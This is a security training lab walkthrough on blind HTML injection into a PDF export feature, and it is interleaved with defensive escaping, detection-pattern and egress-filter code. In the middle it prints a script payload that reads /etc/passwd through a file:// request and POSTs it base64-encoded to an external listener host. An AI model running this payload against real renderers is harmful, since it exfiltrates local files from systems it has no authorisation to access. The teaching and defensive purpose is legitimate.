PDF export injection

PDF export injection - Blind injection

Medium
25 min

Sometimes you know that the application renders your HTML, but you either cannot see the generated PDF at all, or the injected HTML does not end up in a visible place in the document. In that case the injection is blind, and the data has to be leaked through another channel. Let's explore this in this module.

In this module, we will solve the lab together. If you wish, you can stop reading and attempt to solve it yourself. Otherwise, you can follow the steps below at your own pace.

Exercises

Flag

Find the flag from the lab environment and enter it below.

Vulnerability Verification

The application is almost the same as in the previous module, with the exception that this time the application does not allow us to download the generated PDF file. We must therefore verify the vulnerability by other means.

This is where the Hakatemia listener tool is most useful. Let's start by creating a new listener URL and writing JavaScript code that calls that URL. This way we can verify two things.

  • Whether JavaScript execution is allowed
  • Whether the system generating the PDF can reach the external network

Sometimes the HTTP request never arrives but a DNS lookup does. This can mean, for example, that a firewall in front of the renderer blocks the HTTP traffic; DNS is typically allowed. If neither an HTTP request nor DNS traffic shows up on the listener, try other HTML elements such as image and style resources. This shows whether only JavaScript execution is being blocked.
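The checks above are what an attacker runs; the defender's counterpart is to screen and escape user-supplied fields before they are placed into the HTML that the PDF renderer consumes. The following is an added example, not code from the Hakatemia lab: the pattern list, the field names and the sample profile are this example's own constructions.

```javascript
// Added example (not part of the Hakatemia lab): server-side screening of
// user-supplied profile fields before they go into the PDF template.
// Patterns, field names and the sample profile are constructed for this example.

// Markup that can execute code or reach the network from inside the renderer.
// Each entry: [label, regex].
const RISKY_PATTERNS = [
  ["script-tag", /<\s*script\b/i],
  ["event-handler", /\son[a-z]+\s*=/i],
  ["javascript-uri", /javascript\s*:/i],
  ["file-uri", /file\s*:\/\//i],
  ["remote-resource", /<\s*(img|link|iframe|object|embed|style|video|audio|source)\b[^>]*\b(src|href|data)\s*=\s*["']?\s*(https?:)?\/\//i],
  ["css-import", /@import\b|url\s*\(/i],
];

// Returns the labels matched by the field; an empty array means it looks inert.
function screenField(value) {
  const findings = [];
  for (const [label, re] of RISKY_PATTERNS) {
    if (re.test(String(value))) findings.push(label);
  }
  return findings;
}

// HTML-escapes a string so the renderer treats it as text, never as markup.
// Ampersand is replaced first so later replacements are not double-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Builds the profile HTML for the PDF. Every user field is escaped regardless
// of the screening result; the findings are returned so they can be logged
// or alerted on (a submitted <script> is a signal worth keeping).
function buildProfileHtml(profile) {
  const findings = {};
  for (const [key, value] of Object.entries(profile)) {
    const f = screenField(value);
    if (f.length) findings[key] = f;
  }
  const html =
    `<html><body><h1>${escapeHtml(profile.name)}</h1>` +
    `<p class="comment">${escapeHtml(profile.comment)}</p></body></html>`;
  return { html, findings };
}

// Constructed sample: the comment carries the kind of probe used in the lab.
const SAMPLE_PROFILE = {
  name: "Example User",
  comment: '<script>x=new XMLHttpRequest;x.open("GET","https://listener.example");x.send();</script>',
};

// Stand-alone usage.
console.log(JSON.stringify(buildProfileHtml(SAMPLE_PROFILE), null, 2));
```

Escaping is the actual fix; the screening list is a detection aid and will not catch every encoding trick, so it should feed logging rather than replace the escaping step.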

We use the following code and place it in the comment field. After this, we send the profile for evaluation.

<script>
  // Out-of-band probe: a single GET to the listener URL. A hit proves that
  // JavaScript ran during PDF generation and that the renderer can reach
  // the external network.
  x = new XMLHttpRequest();
  x.open("GET", "https://z8u013a69c.hit.ha-listener.com");
  x.send();
</script>

We see hits on the listener, which confirms that the application is vulnerable: it executes injected JavaScript, and that JavaScript can communicate with the outside world.

Exploitation of the vulnerability

The next step is to exploit the vulnerability and leak the passwd file from the system. This is straightforward with JavaScript and consists of two steps.

  • First, we retrieve the content of the file
  • Then we send this to the listener

Our code looks something like this.

<script>
  // Step 1: read the local file through the renderer's own file:// access.
  passwd_xhr = new XMLHttpRequest();

  // Runs once the file read has completed.
  passwd_xhr.onload = function () {
    // Base64-encode the file content so it survives as an HTTP body.
    var bs64 = btoa(this.responseText);
    // Step 2: send the encoded content to the listener ("kuuntelija" is Finnish for "listener").
    kuuntelija = new XMLHttpRequest();
    kuuntelija.open("POST", "https://z8u013a69c.hit.ha-listener.com");
    kuuntelija.send(bs64);
  };

  passwd_xhr.open("GET", "file:///etc/passwd");
  passwd_xhr.send();
</script>

First, we fetch the content of the passwd file with an XMLHttpRequest. We assign an onload handler (passwd_xhr.onload) that runs once that first request completes. The handler base64-encodes the file content and then sends it to the listener with a second XMLHttpRequest.

We sent the profile for evaluation and got a hit on the listener. The HTTP request contained a base64-encoded body, which we can now decode using Hakatemia's converter tool.

Incoming HTTP request to the listener.

Decoding base64-encoded data contained in the HTTP body in the transformer.

This is how we were able to leak the file even though we never had access to the generated PDF. In the next module we'll look at what to do when outbound HTTP traffic is blocked.
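Both requests in the payload above (the file:// read and the POST to the listener) are requests the renderer makes on the application's behalf, so the defensive control that matches this technique is an egress policy on the renderer itself: allow-list the origins the template legitimately needs and refuse everything else. The following is an added example, not code from the Hakatemia lab or any renderer's API; the allowed origin is constructed, and the hook that would apply the policy (a request-interception callback in a headless browser) is described only in a comment.

```javascript
// Added example (not part of the Hakatemia lab): a request policy for a
// headless-browser PDF renderer. It allow-lists the origins the renderer may
// fetch from and refuses file: URIs and everything else. Wire decideRequest()
// into the renderer's request-interception hook, if it has one (assumption:
// the hook hands each outgoing request URL to a callback that can abort it).

const ALLOWED_ORIGINS = new Set([
  "https://pdf-assets.internal.example", // constructed: where the template's CSS/images live
]);

// Returns { allow, reason } for one URL the renderer tries to load.
function decideRequest(rawUrl, allowedOrigins = ALLOWED_ORIGINS) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return { allow: false, reason: "unparseable-url" };
  }
  if (url.protocol === "file:") {
    // This is the read of /etc/passwd in the lab payload.
    return { allow: false, reason: "local-file-read" };
  }
  if (url.protocol === "data:" || url.protocol === "blob:") {
    // Inline content never leaves the renderer, so it cannot exfiltrate.
    return { allow: true, reason: "inline-data" };
  }
  if (url.protocol !== "https:") {
    return { allow: false, reason: "non-https-scheme" };
  }
  if (!allowedOrigins.has(url.origin)) {
    // This is the callback to the listener in the lab payload.
    return { allow: false, reason: "origin-not-allow-listed" };
  }
  return { allow: true, reason: "allow-listed-origin" };
}

// Applies the policy to every URL a rendering job attempted and returns the
// refused ones, which is the audit trail worth logging per job.
function refusedRequests(urls, allowedOrigins = ALLOWED_ORIGINS) {
  return urls
    .map((u) => ({ url: u, ...decideRequest(u, allowedOrigins) }))
    .filter((d) => !d.allow);
}

// Constructed sample: requests a rendering job might see, including the two
// made by the lab's payload.
const SAMPLE_REQUESTS = [
  "https://pdf-assets.internal.example/css/profile.css",
  "file:///etc/passwd",
  "https://z8u013a69c.hit.ha-listener.com/",
  "data:image/png;base64,iVBORw0KGgo=",
  "http://pdf-assets.internal.example/logo.png",
];

// Stand-alone usage.
console.log(refusedRequests(SAMPLE_REQUESTS));
```

A policy applied inside the renderer only governs the requests the renderer itself issues. As the page notes, DNS traffic is often still allowed where HTTP is blocked, so a network-level egress filter on the rendering host (deny by default, with the same allow-list) is the complement to this check, and the renderer should run with JavaScript disabled unless the template genuinely needs it.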
